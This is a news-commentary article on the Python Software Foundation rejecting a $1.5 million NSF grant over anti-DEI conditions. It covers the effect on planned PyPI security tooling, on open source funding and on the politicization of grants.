According to Ars Technica, the Python Software Foundation has rejected a $1.5 million National Science Foundation grant due to anti-DEI requirements imposed by the Trump administration. The grant would have been the largest in the organization’s history and was intended to fund security improvements for Python and PyPI through automated proactive review tools. After a months-long vetting process where only 36% of new NSF applicants typically succeed, the foundation was presented with terms requiring them to affirm they “do not, and will not during the term of this financial assistance award, operate any programs that advance or promote DEI.” The foundation’s board voted unanimously to withdraw the application, citing conflict with their mission to support “a diverse and international community of Python programmers.” This decision follows a similar withdrawal by The Carpentries in June over identical concerns.
Table of Contents
The Unseen Cost of Standing by Principles
This decision represents a significant financial sacrifice for an organization with an annual budget of just $5 million and only 14 staff members. The rejected $1.5 million grant represents 30% of their annual operating budget, a substantial amount that could have dramatically accelerated their security initiatives. What makes this particularly notable is that the Python Software Foundation’s mission explicitly includes supporting diversity, making the grant requirements fundamentally incompatible with their core values. This isn’t just about turning down money—it’s about protecting an organizational identity that has been carefully cultivated over decades.
The Real Cybersecurity Consequences
The security work that would have been funded represents a critical advancement in open source protection. Currently, Python package security relies on reactive reviews, meaning malicious code is only discovered after it’s been deployed. The proposed automated proactive review system would have analyzed packages before they reached users, using capability analysis based on known malware datasets. This technology could have been transferable to other major package registries like NPM and Crates.io, creating a security uplift across multiple programming ecosystems. The delay in implementing these protections leaves millions of developers vulnerable to supply-chain attacks that are becoming increasingly sophisticated.
Broader Political Landscape
The NSF’s new requirements that took effect in May represent a significant shift in how government funding interacts with diversity initiatives. The restriction applies not just to activities directly funded by the grant but to “any and all activity of the PSF as a whole,” creating an all-or-nothing scenario. This broad application means organizations must choose between accepting funding and maintaining their existing diversity programs, even those funded through other sources. The National Science Foundation, traditionally focused on scientific advancement, now finds itself enforcing political requirements that conflict with many technology communities’ established practices.
Setting a Dangerous Precedent
The Python Foundation’s decision follows The Carpentries’ similar withdrawal in June, indicating a pattern that could affect numerous open source and educational organizations. These precedents create a chilling effect where other foundations might self-censor their diversity initiatives to qualify for government funding. The requirement that violation could lead to “claw back” of previously transferred funds creates enormous financial risk, essentially holding entire organizations hostage to political compliance. This could fundamentally alter how open source foundations operate, potentially pushing them toward corporate sponsorship models that come with their own sets of restrictions and expectations.
What This Means for Open Source Sustainability
The Python Foundation’s call for alternative funding from companies and individuals who use Python highlights a broader challenge in open source sustainability. While open source foundations have traditionally supplemented corporate sponsorship with government grants, this incident suggests that funding sources are becoming increasingly politicized. The technology industry may need to step up more significantly to fund critical infrastructure projects, but corporate funding often comes with strings attached regarding intellectual property or development priorities. This creates a difficult balancing act for foundations trying to maintain their independence while securing necessary resources for community projects.
The Ripple Effect Across Technology
Python’s position as one of the world’s most popular programming languages means this decision affects far beyond the foundation itself. With Python being fundamental to fields from data science to web development to artificial intelligence, any security vulnerabilities in its ecosystem have widespread consequences. The foundation’s stance may inspire other technology organizations to reevaluate their funding sources and diversity commitments. However, smaller organizations with less financial cushion may feel pressured to comply with restrictive terms, potentially undermining diversity efforts across the technology sector at a time when representation remains a significant challenge.
